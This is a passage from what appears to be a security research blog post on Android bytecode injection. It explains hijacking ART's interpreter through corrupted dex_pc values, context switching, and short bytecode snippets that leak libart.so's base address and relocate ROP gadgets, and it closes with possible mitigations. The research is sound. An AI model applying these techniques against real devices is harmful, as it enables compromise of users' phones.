bytes behind the buffer base address, i.e. starting at index 0x1000 / 8 = 0x200
.
For a PoC , consider the following video.
Context - Switching
In this section, I want to discuss a few approaches on how to handle insufficient contexts during bytecode injection. A major problem is if the context available does not provide enough types or methods to do anything useful. For example, if we were missing the StringBuilder
type in the above case study, then the payload would not work. Of course, as is discussed later
, we could try to use bytecode as an intermediate stage in case the context is insufficient.
Alternatively, if an attacker wants to only execute bytecode, because e.g. native - level security mechanisms are preventing any kind of ROP, then the attacker will only be left with switching the context. As of writing, two ways to perform context - switching come to mind. All approaches work by corrupting a different dex_pc
than the one that provides an insufficient context. In general, as long as an attacker can ensure that a dex_pc
is executed eventually, that dex_pc
may be used to switch the execution context. The following visualization shows the high - level idea of context - switching. Notice that the context is determined by an attacker’s goals.
The first approach is to try to corrupt an ArtMethod
that is stored in a predictable location. For this to work, the method must be called after the attacker corrupted the dex_pc
. Finding an ArtMethod
instance is tricky and may require additional information leaks for a remote attacker. In a local setting, there exists a plethora of ArtMethod
s to be used by an attacker, e.g. in boot.art
.
Secondly, if an attacker is only given the ability to corrupt stack values, then the bytecode method call chain can be traversed to find a fitting context. Because the Android runtime is complex, often plenty of method invocations are performed until the vulnerable native method is called eventually. This leaves room to corrupt other dex_pc
s belonging to parent methods. However, if an attacker is unable to go up the call chain, then it may be possible to go down the call chain. To that end, an attacker needs to be able to invoke a method that takes in a callback. If an attacker is able to pass a callback consisting of custom bytecode into a method, then this will result in a new call chain until the callback is invoked. These ideas are visualized in the following diagram.
Basically, the above figure shows stack frames matching a call chain. On the left, an attacker corrupts any spilled dex_pc
on the stack, potentially switching the context depending on what method is hijacked. On the right, an attacker somehow manages to pass custom bytecode into a method that eventually invokes that bytecode. From there on, an attacker can either use bytecode to corrupt a legitimate, calling method that stems from the callback call chain, or stay in the context of the callback. Notice, however, that specifying a callback most certainly requires knowledge on the class of the callback object. Therefore, specifying a callback requires knowing the context of the callback, which somewhat defeats the purpose of doing this in the first place.
Regardless of what approach is used, the absolute best context to end up in is in a .dex
file of framework.jar
. These .dex
files contain a large fraction of the app - related Android runtime and thus provide a lot of types and methods. Moreover, because framework.jar
is copied to all apps forked from zygote64
, pure bytecode payloads for .dex
files of framework.jar
are universal for the target device under the assumption that framework.jar
does not change.
Further Applications
The case study shows that bytecode injection can be used to fully take over a thread in the target app via a memory error. For the PoC, bytecode is used to invoke a system command.
However, it is also possible to use bytecode as an intermediate stage, e.g. to set up a ROP chain. To that end, remember that vregs are not bounds - checked. Therefore, any attacker - chosen bytecode can access, i.e. read and write, any value on the stack following the vregs and vrefs arrays of the hijacked method. Ignoring the fact that writing to e.g. v0
almost always writes to r0
as well, it is possible for bytecode to set up ROP gadgets on the stack by filling the right vregs and vrefs that overlap with a return address. Notice that one can use bytecode instructions like move-object
to always write a value to both, vregs and vrefs. Then, an attacker can pretend to only write to vrefs to set up the ROP chain on the stack, fully ignoring the fact that writing to vrefs at some point overwrites the values stored in vregs.
In the example above, using ROP directly is most likely impossible, because an attacker is lacking knowledge on the location of an executable memory region to return into. However, because bytecode can read beyond the vregs array, an attacker can pick up a code pointer stored on the stack, e.g. a return address, and use it to compute the base address of the associated module. Of course, an attacker must be able to either identify the module to compute the base address, or handle segfaults to probe for the beginning of the memory region. Given the base address, an attacker can then relocate their own gadgets stored inside the bytecode, e.g. as constants encoded inside instructions, to obtain a fully functional ROP chain. Then, what is left is to link the ROP chain into a return address, which kicks off gadget chain execution.
For example, the following bytecode can be used to grab the base address of libart.so
. Notice that return_address_vreg_index
and return_address_offset
are to be chosen by an attacker and mean the index of the return address in terms of vregs and the offset of the return address relative to libart.so
, respectively.
move-wide/16 v0, <return_address_vreg_index>
const-wide v2, <return_address_offset>
sub-long v0, v0, v2
Once a fitting ROP chain is found, parts of the chain must be marked for dynamic relocation. An example of a ROP chain component that does not need relocation is a command string. Of course, if working with the address of the command string, relocation will be necessary again. Consider the generic bytecode for relocating ROP gadgets:
const-wide v2, gadget
add-long v2, v2, v<libart_base_vreg_index>
move-object16 v<2 * index + return_address_vreg_index>, v2
move-object16 v<2 * index + return_address_vreg_index + 1>, v3
In a nutshell, gadget
is the offset of the current gadget relative to libart.so
. The offset is stored to v2
and v3
(64 - bit in total) and added to the vreg that holds the base address of libart.so
. Results are stored into v2
. Afterwards, move-object16
is utilized to lower and upper 32 - bit values of the relocated address into vregs and vrefs that represent the current ROP chain gadget on the stack. The above code snippet is executed for each ROP gadget, which means the ROP chain is built up one by one at runtime. This is only possible, because vreg and vref indices are not bounds - checked at runtime. Furthermore, observe that gadget offsets are stored inside bytecode and relocated using spilled libart leak.
Without discussing all the details of the PoC exploit, the following visualization aims to highlight the general idea of using bytecode to relocate a ROP chain.
And finally, to finish off the idea of bytecode - induced ROP attacks, a PoC video is provided!
Another interesting approach may be to look into similar bytecode - related exploitation areas, like V8
. Usually, when exploiting a bug in V8, an attacker builds up primtives like fakeobj
and addrof
, which are often escalated into read
and write
primitives. Without having looked into this thoroughly, it may be possible to use the same ideas when injecting bytecode to construct and access objects that allow reading from and writing to arbitrary memory regions. However, a limiting factor seems to be that object references are always 32 - bit addresses. Luckily, there exist classes like Parcel
and its associated C++ implementation
that store 64-bit pointers inside objects. Taking into account that Parcel
provides methods like writeLong
that writes a 64-bit value to a location relative to an internal pointer, Parcel
seems like the perfect candidate to build up WWW and RWW primitives from bytecode. Furthermore, Parcel
is a very common class and thus available in a plethora of contexts. Unfortunately, due to time constraints, I have not been able to construct a PoC for this idea.
Possible Mitigations
Following native - level mitigations against code injection, the first idea that comes to mind is to somehow force nterp
to distinguish between code and data. For example, it may be possible to restrict dex_ptr
to .dex
files only. However, even inside a .dex
file, data and code are mixed. For example, the code_item
of a method in a .dex
file consists of metadata describing and the concrete bytecode representing the method. Therefore, restricting bytecode execution to .dex
files does not suffice, unless it can be guaranteed that redirecting bytecode execution to data structures in a .dex
file does not suffice for a successful exploit, which is impossible. Because data and bytecode are closely coupled in memory, nterp
cannot use page permissions either: the page permissions are to coarse.
Another approach could be to redesign the layout of .dex
files, so that bytecode is stored in executable readonly regions, whereas associated data structures are stored in adjacent readonly memory. Whether this is practical or not is to be determined. Such a major redesign would also need rigorous permission checks, because nterp
does not have hardware support that prevents execution of non - executable memory.
Summary
In this blog post, the first bytecode - based exploitation technique, namely bytecode injection, is discussed and demonstrated using a simplistic, deliberately vulnerable Android app. Various caveats regarding bytecode injection, like String
construction, method invocation and even insufficient contexts, are explained and solved. Furthermore, it is highlighted how bytecode may function as a stepping stone for other attacks like ROP.
A neat side - effect is that bytecode is architecture - agnostic. Only changes to the bytecode interpreter can prevent that bytecode shellcode executes successfully. Because it is possible to create Android apps for various older Android versions, shellcode can most certainly be constructed as backward - compatible as an app can be.